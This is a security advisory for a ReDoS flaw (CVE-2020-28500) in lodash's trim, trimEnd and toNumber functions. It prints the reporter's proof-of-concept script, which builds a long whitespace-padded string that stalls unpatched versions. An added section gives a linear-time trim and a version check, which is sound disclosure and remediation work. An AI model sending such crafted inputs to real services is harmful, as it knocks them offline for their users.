
Regular Expression Denial of Service (ReDoS) in lodash

Moderate severity. GitHub Reviewed. Published Jan 6, 2022.

Package

lodash (npm)

Affected versions

< 4.17.21

Patched versions

4.17.21

Description

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen):

    var lo = require('lodash');

    // Build a string of the form "1", n spaces, "1". The trailing "1" means
    // the trailing-whitespace regex can only fail after scanning the spaces.
    function build_blank(n) {
      var ret = "1";
      for (var i = 0; i < n; i++) {
        ret += " ";
      }
      return ret + "1";
    }

    var s = build_blank(50000);

    // Time each affected function on the same input (milliseconds).
    var time0 = Date.now();
    lo.trim(s);
    var time_cost0 = Date.now() - time0;
    console.log("time_cost0: " + time_cost0);

    var time1 = Date.now();
    lo.toNumber(s);
    var time_cost1 = Date.now() - time1;
    console.log("time_cost1: " + time_cost1);

    var time2 = Date.now();
    lo.trimEnd(s);
    var time_cost2 = Date.now() - time2;
    console.log("time_cost2: " + time_cost2);
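The following is an added example, not code from the advisory, the reporter or lodash itself. It assumes the slow path is a backtracking regex of the shape `/\s+$/` applied to the reporter's "1", spaces, "1" input (that explanation is an assumption; the advisory only names the affected functions), shows a linear-time trim with no such worst case, and includes a hypothetical `isVulnerableLodashVersion` helper that gates on the patched version the advisory lists. It needs no lodash install and runs stand-alone under Node.

```javascript
// Added example (not from the advisory, the reporter or lodash).
// Demonstrates the quadratic regex shape, a linear-time trim, and a
// version check against the patched release named in the advisory.

// Regex-shaped trimEnd (assumed shape of the slow path). On "1" + N spaces
// + "1", \s+ is retried from every space position and each attempt scans to
// the final "1" before failing, so the cost grows quadratically with N.
const reTrimEnd = /\s+$/;
function regexTrimEnd(s) {
  return s.replace(reTrimEnd, "");
}

// Single-character whitespace test. Applied to one character at a time it
// cannot backtrack, so the scans below are O(n) for every input.
const reWhitespace = /\s/;

// Linear trimEnd: walk inward from the right until a non-whitespace char.
function safeTrimEnd(s) {
  let end = s.length;
  while (end > 0 && reWhitespace.test(s.charAt(end - 1))) end--;
  return s.slice(0, end);
}

// Linear trim: find both boundaries with one pass from each side.
function safeTrim(s) {
  let start = 0;
  let end = s.length;
  while (start < end && reWhitespace.test(s.charAt(start))) start++;
  while (end > start && reWhitespace.test(s.charAt(end - 1))) end--;
  return s.slice(start, end);
}

// Reporter's input shape, constructed here for the demonstration.
function buildBlank(n) {
  return "1" + " ".repeat(n) + "1";
}

// Wall-clock cost in milliseconds of applying fn to input.
function timeMs(fn, input) {
  const t0 = Date.now();
  fn(input);
  return Date.now() - t0;
}

// Hypothetical dependency gate: true when the given lodash version is below
// 4.17.21. Numeric compare on major.minor.patch; prerelease suffixes ignored.
function isVulnerableLodashVersion(version) {
  const PATCHED = [4, 17, 21];
  const parts = version.split("-")[0].split(".").map((p) => parseInt(p, 10) || 0);
  for (let i = 0; i < 3; i++) {
    const v = parts[i] || 0;
    if (v !== PATCHED[i]) return v < PATCHED[i];
  }
  return false;
}

// Compare both trims on the reporter's input shape; both return the input
// unchanged because it ends in "1", but only one does so in linear time.
function demo(n) {
  const s = buildBlank(n);
  console.log("regex trimEnd ms:  " + timeMs(regexTrimEnd, s));
  console.log("linear trimEnd ms: " + timeMs(safeTrimEnd, s));
  console.log("lodash 4.17.20 affected: " + isVulnerableLodashVersion("4.17.20"));
}

demo(10000);
```

Raising the argument to `demo` toward the reporter's 50000 makes the gap between the two timings obvious; the linear scan stays flat while the regex version grows with the square of the input length. The version helper is the kind of check to run over a lockfile's resolved `lodash` entries when triaging this advisory.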

References

CVE ID

CVE-2020-28500

CVSS Score

5.3 Moderate
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L